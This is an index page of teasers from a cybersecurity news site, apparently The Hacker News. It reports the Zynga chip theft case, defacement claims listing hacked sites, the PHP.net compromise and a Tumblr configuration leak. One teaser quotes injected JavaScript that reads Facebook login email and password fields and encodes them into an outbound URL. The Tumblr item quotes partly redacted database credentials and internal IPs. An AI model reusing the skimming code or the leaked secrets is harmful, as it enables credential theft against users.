The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Zynga hacker, Ashley Mitchell jailed for two years ! British bloke Ashley Mitchell, 29, has been jailed for two years after stealing some 400 billion virtual gaming chips gaming company Zynga. Mitchell hacked his way into Zynga's back-end systems by pinching the identities of two Zynga employees and filleted the swag, some of which he managed to flog on Facebook and some he used to gamble his nights away playing online poker. Mitchell, of Paignton, Devon pleaded guilty to hacking the servers and pinching the chips, which were estimated to be worth around £7.4 million in real money. He flogged around a third of his ill-gotten gains for £53,612. James Taghdissian, prosecuting, told the court that Zynga realised in August 2009 that its chips were disappearing and suspicion fell on two employees. It turned out that Mitchell was using their details to gain access to the stash. Mitchell had been using his neighbours' Wi-Fi connections to carry out his hacks, which lead to t...

1337hax & Windowsforums hacked by Team - Indishell ! Hacked sites : http://1337hax.org/ http://www.zone-h.net/mirror/id/13288096 http://windowsforums.org/ http://www.zone-h.net/mirror/id/13288104

Tumblr security flaw , Clarification by Tumblr official staff ! On our yesterday post about  Tumblr security flaw : server IPS, API keys, passwords, etc were leaked , Finally Tumblr official staff gives a statement to all their users as below : A human error caused some sensitive server configuration information to be exposed this morning. Our technicians took immediate measures to protect from any issues that may come as a result. We’re triple checking everything and bringing in outside auditors to confirm, but we have no reason to believe that anything was compromised.  We’re certain that none of your personal information (passwords, etc.) was exposed, and your blog is backed up and safe as always.  This was an embarrassing error, but something we were prepared for. The fact that this occurred at all is still unacceptable, and we’ll be seriously evaluating and adjusting our processes to ensure an error like this can never happen again. ...

The PHP Group has confirmed the compromise of their server ! In our last post we post that, Php.net got Compromised , Read here  . Today finaly PHP group has announce that they was really got hacked,as shown in above image. Link :  http://www.php.net/archive/2011.php#id2011-03-19-2

3 websites hacked By Rao Assasin Hacker ! Hacked sites :  http://www.zooguiden.com/index.html http://www.ridleder.com/index.html http://www.bcwater.gov.cn/index.html News Source : Rao Assasin Hacker

Paki UrduHack Security Team Is No More ! The UrduHack Team Said This: I HAVE FINALLY DECIDED TO SHUTDOWN THIS SITE AND PAKI URDUHACK SECURITY TEAM FOREVER. FROM THIS MOMENT FORWARD,URDUHACK TEAM IS NO MORE,IT'S BEEN A WONDERFULL JOURNEY. DUE TO PERSONAL LIFE MATTER'S I DECIDED TO SHUTDOWN URDUHACK SECURITY TEAM.IF ANYONE USE OUR NAME OR ANYTHING ,I AM NOT RESPONSIBLE FOR HIS ACTIONS.I STARTED THIS TEAM 4 YEARS AGO ALONE BY MYSELF,DURING MY JOURNEY I MET WITH GREAT GOOD PEOPLES AND SOME BAD ONES ALSO.I DEDICATED ALL MY WORK TO MY LATE BROTHER CODE-5 ,WHO IS NO LONGER WITH ME,HE WILL BE ALWAYS REMEMBERED IN MY HEART.I WOULD LIKE TO THANK MY DEAREST FRIEND SHOZY,WHO SUPPORTED ME IN SO MANY WAYS,I CANNOT DEFINE IN WORDS.THE CONTROL OF THIS DOMAIN WILL BE IN ARSLAN HAND, HE OWN THIS DOMAIN NAME AND EVERYTHING RELATED HOST AND EVERYTHING,IF I EVER HURT ANYONE FOR THAT I AM REALLY SORRY,PLEASE FORGIVE ME. A MESSAGE FOR NEW YOUNGSTERS FROM PAKISTAN. PLEASE PLEASE PLEASE DON'T W...

40 websites defaced by A42 & skywalk3r (Team Greyhat) Hacked sites list :  http://pastebin.com/HUNLSXcQ News Source : A42 & skywalk3r (Team Greyhat)

You perhaps have followed the recent actualities about Tunisian Government stealing accounts on facebook. Read More Here ... There’s how they do: Here’s the web page of Facebook as seen when you’re connected in Tunisia http://pastebin.com/WV0C9t0F Let’s take a look at that javascript curious part.. !-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else...

Update : Tumblr security flaw, Clarification by Tumblr official staff ! : The Hacker News ~ http://www.thehackernews.com/2011/03/tumblr-security-flaw-clarification-by.html There is a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. There are some of the stuff that got disclosed: Database::set_defaults(array(  ‘user’ => ‘tumblr3′, ‘password’ => ‘m3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′,  .. define(‘MEMCACHE_HOST’, ’10.252.0.68′); define(‘MEMCACHE_VERSION_HOST’, ‘ 10.252.0.67 ‘); Database::add(‘primary’, array(‘host’ =>  ’192.168.200.142 ‘)); .. We redacted a bit to protect the innocent, but anyone can find it on Google. So what is going on? Did they got hacked somehow? We don’t think so… By looking at the disclosed data dump, it looks like one of their developers make a little mistake: i?php require_once(‘chorus/Utils.php’); Can you see it above? Instead of starting ...